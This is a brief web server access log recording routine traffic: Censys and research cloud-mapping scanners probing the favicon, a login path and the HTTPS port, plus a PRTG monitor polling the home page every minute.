167.94.145.57 - - [04/Jan/2024:23:27:34 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.57 - - [04/Jan/2024:23:27:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
3.8.140.82 - - [04/Jan/2024:23:27:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:28:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:28:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:28:36 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:28:42 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:29:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:29:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:29:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:29:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:30:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:30:58 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:31:04 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:23:31:11 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:23:31:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:32:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:32:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:32:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:32:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
